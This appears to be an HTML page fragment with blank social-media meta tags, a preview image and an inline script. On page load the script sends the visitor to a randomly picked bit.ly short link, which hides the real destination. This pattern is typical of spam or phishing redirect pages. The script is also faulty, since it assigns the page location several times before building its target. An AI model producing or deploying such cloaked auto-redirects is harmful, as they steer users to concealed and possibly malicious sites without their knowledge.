<meta property="og:title" content=" ..">
<meta property="og:description" content="
                               

....

">                    
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="
https://blogger.googleusercontent.com/img/a/AVvXsEh_nXRRe2SDyG0KnP9WcMIuCDG1jEjzYgtYzGVhyR0Z1BGYungtxYL2MRFNabIknucD-w3b0dE9GngPFlHmo2efOq6Ls6DQF7eN5N4UsI4oPr81JEb-YUI4t3uKkBw0JLWB57Ut1dX8C3MzAteDSni1JdPXenpbeNvOqBtq6x6CYOMBfWcrXbdOJJmlWw=s16000




">                             
<script type = "text/javascript">
function reDirect() {
a = location.href = "bit.ly/";
b = location.href = "pon";
c = location.href = "pona";
d = Math.ceil(Math.random() * 24);
a = "https://" + a + b + c + d ;
window.location = a
}
reDirect();
</script>

